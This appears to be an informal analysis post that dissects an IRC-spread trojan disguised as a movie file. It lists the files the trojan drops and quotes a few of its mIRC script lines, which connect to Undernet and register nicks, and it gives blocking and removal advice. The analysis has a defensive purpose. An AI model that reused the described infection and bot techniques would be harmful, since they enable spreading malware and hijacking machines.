Basically this is tellin WM to download the exe and save it to C:\\Program Files\\Windows Media Player as
wmplayer.exe , it is then ran & exacutes & error page so you are led to belive the movie is faulty,
where in fact its a virus that downloads in the background & is exacuted, at the moment i havent took alook
at the exe or disambled it but it looks like it fires open a few ports where it servers itsself & then joins
irc networks spammin the messages to infect more people.
I need to now disemble the .exe so i can see exacly what the virus/trojan is doin & where its being controlled
from, ill post more as i look into this

-----------------------------

Ok i decomplied the exe and the virus/backdoor trojan or what ever you want to call it was written
by someone calling themself "flye" ? ( heh smart guy eh puttin his nick in the dam thing )

OK so lets go into detail with this "EXE"

The EXE has a number of functions
Not in any order heres what it does:

unpacks to various files -
fyle.exe [ Irc Client / Bnc ?? ]
The_Magnificent_Fyle.ini [ The irc config file with server addresses, Name to use etc
I use linux so im not able to infect myself to see this in full details ]

me.mpg [ Does this need explaining ? this is what is being spammed on the irc networks & contains
the above code ]
tmp.bat [ The .bat file that sets the complete process off ]

IF YOU RUN A IRC NETWORK YOU MUST BE AWARE THAT THIS VIRUS/TROJAN/BACKDOOR REGISTERS ITSELF
ON YOUR NETWORK THIS IS FOUND IN THE FOLLOWING CODE:
'n86= sw PRIVMSG nickserv :register $prnick(1) $+ $prnick(1) $prnick(1) $+ @hotmail.com'
MAYBE A BLOCK SHOULD BE SET TO STOP @HOTMAIL ADDRESSES REGISTERING NEW NICKS ?

From what i can this this only connects to port 6667
Seen is this line : 'n532= if (%tmp == 0) sockopen findIP irc.undernet.org 6667'
So closing off port 6667 might be a good idea or putting up a dummy ircd on the port
with a warning/notice to real users to connect to a diffrent port, if you downloaded this file from
some where on the net it will contains a few files to create the dummy ircd
[ credits for deflye.sh go to the staff @ irc.mysteria.net for the original file to which i just edited ]

dummy-ircd.c DOES NOT LOG - WHILE deflye.sh DOES LOG

This virus/backdoor is going around infecting people to create bnc's for a channel on irc.undernet.org
*Sigh*
This is found online 22,996:
'n607= sockwrite -n undernet TOPIC $hget(undernet,2) :Free BnC Courtesy of Fyle: /server -m $hget(myIP,1) $sock(bncListen).port'

Im not going to go into any more detials with this as ive no need to the me.mpg & windowsMedia.exe
are with this files but packed into a zip so you dont infect yourself

!!! SO BE WARNED !!!


Greetz
LiquidIce
admin@infoslash.org

Ive attached the code for others to run though
*NOTE*
THE VIRUS/BACKDOOR IS IN /VIRUS/

Is this detected ? No - ive contacted f-secure and they are analizing the files ive submitted + a report i sent-
How do i protect myself ? Dont open any movie links mpgsthat you are not sure of common scence really
What if im infected ? open reg edit go to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run & delete the "flye" entry also go into your windowsmedia dir and the sounds dir and delete The_Magnificent_Fyle.ini , flye.exe - which could also be in Fsounds & f.reg + temp.bat and any other junk it might have dumped in there